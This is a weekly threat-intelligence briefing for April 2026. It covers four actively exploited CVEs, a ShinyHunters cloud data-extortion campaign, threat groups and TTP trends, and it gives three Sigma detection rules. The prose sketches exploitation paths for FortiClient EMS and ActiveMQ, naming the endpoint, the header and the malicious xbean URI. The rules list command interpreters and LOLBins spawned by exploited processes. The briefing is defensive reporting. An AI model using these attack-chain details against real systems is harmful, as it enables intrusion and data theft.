Weekly threat briefing: April 13–20, 2026

The big picture: This week's threat landscape is defined by two things — a coordinated data extortion campaign from ShinyHunters that bypassed every perimeter defense by targeting cloud SaaS platforms, and four actively exploited CVEs added to CISA's Known Exploited Vulnerabilities catalog. If you run FortiClient EMS 7.4.4, Apache ActiveMQ, Adobe Acrobat, or on-prem SharePoint Server, stop reading and start patching.

Critical vulnerabilities this week

Four vulnerabilities were added to the CISA KEV catalog between April 13–16. All four have confirmed exploitation in the wild and available patches.

CVE	PRODUCT	CVSS	TYPE	PATCH
CVE-2026-21643	FortiClient EMS 7.4.4	9.8	Unauth SQL injection → RCE	7.4.5+
CVE-2026-34197	Apache ActiveMQ Classic	8.8	Jolokia API → remote code execution	5.19.4 / 6.2.3
CVE-2026-34621	Adobe Acrobat Reader	Critical	Prototype pollution → arbitrary code exec	Emergency update
CVE-2026-32201	Microsoft SharePoint Server	High	Spoofing via input validation bypass (0-day)	April Patch Tuesday

The FortiClient EMS vulnerability deserves special attention. FortiClient EMS is the centralized management plane for all FortiClient endpoint agents. An attacker who compromises it doesn't just own one server — they own the management channel to every managed endpoint in the fleet. The SQL injection is unauthenticated, targeting /api/v1/init_consts via a crafted Site header. From there, it's xp_cmdshell to full system compromise.

The ActiveMQ vulnerability (CVE-2026-34197) is equally dangerous for a different reason: default credentials. The Jolokia JMX-HTTP bridge is enabled by default on port 8161, and a staggering number of deployments still run admin:admin. The attack chain is elegant — invoke addNetworkConnector with a malicious xbean: URI that points to an attacker-hosted Spring XML config. The broker eagerly instantiates beans from that XML before any validation occurs. One HTTP POST, and the attacker has a shell.

Breach spotlight: ShinyHunters and the cloud supply chain

ShinyHunters executed the most significant data extortion campaign of the month — and they didn't touch a single victim's network perimeter. Instead, they targeted the cloud platforms those organizations depend on: Snowflake data warehouses and Salesforce tenants.

The confirmed victims so far:

• Rockstar Games — compromised via Anodot, a third-party analytics provider (T1199). ShinyHunters pivoted from Anodot into Rockstar's Snowflake environment, exfiltrating corporate contracts, financials, KPIs, and support ticket data.
• McGraw-Hill — a Salesforce misconfiguration allowed bulk API export of 13.5 million user records (emails, names, physical addresses, phone numbers). Over 100GB exfiltrated.
• OneDigital — another Salesforce-linked breach exposing 28,414 individuals' names and Social Security numbers.

ShinyHunters operates a "pay or leak" model with public countdown timers. They've already set an April 21 deadline for new targets: Zara, Carnival, and 7-Eleven.

ShinyHunters didn't breach Rockstar directly. They breached Rockstar's analytics vendor. If your vendor can access your data, they are your perimeter.

The defensive gap here is fundamental: most organizations don't monitor third-party OAuth token grants, Salesforce Connected App activity, or Snowflake COPY INTO operations. The traditional SOC playbook — watch the firewall, watch the endpoints — is completely blind to this attack chain.

Threat actor activity

GROUP	TYPE	CAMPAIGN	TARGETS
ShinyHunters	Data extortion	Snowflake/Salesforce supply chain	Gaming, education, HR, retail
Qilin	RaaS	Sub-24hr ransomware deployment	Manufacturing, construction
Iranian State (AA26-097A)	Nation-state	Rockwell Automation PLC exploitation	US critical infrastructure
Everest	Ransomware	Nissan automotive breach	Automotive, industrial
The Gentlemen	Emerging RaaS	Selective encryption + data theft	Financial services

The CISA advisory AA26-097A on Iranian-affiliated PLC exploitation is worth reading in full. Federal agencies (FBI, NSA, EPA, DOE, and US Cyber Command) jointly warned of ongoing exploitation of internet-exposed Rockwell Automation/Allen-Bradley programmable logic controllers across water and energy sectors. Suspicious traffic has been observed on OT ports 44818, 2222, 102, and 502, primarily originating from overseas hosting providers. The advisory explicitly states that malicious activity has resulted in "disruptive effects on physical operations."

TTP trends

The dominant initial access technique this week is T1190 (exploit public-facing application), appearing in five of the nine incidents we tracked. But the more interesting signal is the rise of T1199 (trusted relationship) — three incidents involved compromising a vendor to reach the actual target.

On the collection side, T1530 (data from cloud storage objects) appeared in four incidents. Attackers aren't dropping RATs and exfiltrating via C2 channels anymore. They're using the victim's own cloud APIs to export data in bulk — Salesforce query/queryMore pagination, Snowflake COPY INTO statements. This looks like legitimate traffic to most security stacks.

The ransomware landscape continues its shift toward pure data extortion (T1657). Encryption is noisy — it triggers endpoint detection, it creates operational disruption that forces an immediate response. Quiet data theft followed by an extortion demand gives the attacker leverage without the detection risk.

Detection opportunities

Here are three rules you can deploy today. These are Sigma format, compatible with Elastic, Splunk, and Microsoft Sentinel via standard Sigma converters.

1. ActiveMQ Jolokia exploitation (CVE-2026-34197)

title: Apache ActiveMQ Jolokia RCE attempt
id: a7b3c4d5-e6f7-4a8b-9c0d-1e2f3a4b5c6d
status: experimental
logsource:
  category: webserver
detection:
  selection_url:
    cs-uri-stem|contains: '/api/jolokia'
  selection_method:
    cs-method: 'POST'
  selection_body:
    cs-body|contains|all:
      - 'addNetworkConnector'
      - 'xbean:'
  condition: selection_url and selection_method and selection_body
level: critical
tags:
  - attack.t1190
  - cve.2026.34197

2. FortiClient EMS SQL injection (CVE-2026-21643)

title: FortiClient EMS process spawning command interpreter
id: d0e6f7a8-b9c0-4d1e-2f3a-4b5c6d7e8f9a
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith: '\FCTDas.exe'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\whoami.exe'
  condition: selection_parent and selection_child
level: critical
tags:
  - attack.t1059.001
  - cve.2026.21643

3. Adobe Acrobat spawning suspicious child process (CVE-2026-34621)

title: Acrobat Reader spawning command interpreter
id: f2a8b9c0-d1e2-4f3a-4b5c-6d7e8f9a0b1c
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\AcroRd32.exe'
      - '\Acrobat.exe'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\mshta.exe'
      - '\certutil.exe'
  condition: selection_parent and selection_child
level: critical
tags:
  - attack.t1203
  - cve.2026.34621

The week ahead

Three things to watch:

• ShinyHunters' April 21 deadline. Zara, Carnival, and 7-Eleven are on the clock. Whether those organizations pay or the data leaks, we'll learn more about ShinyHunters' operational scope and the true scale of the Snowflake/Salesforce campaign.
• FortiClient EMS exploitation fallout. Given the CVSS 9.8 and the weeks-long exploitation window (active since late March), expect breach disclosures to surface from organizations that were slow to patch. If you run EMS 7.4.4, check your logs for unusual Site header values on /api/v1/init_consts.
• Perimeter device brute-force escalation. SonicWall and FortiGate appliances are seeing sustained credential spraying from Middle East IP ranges. Ensure admin interfaces are not internet-exposed and review authentication logs for anomalous patterns.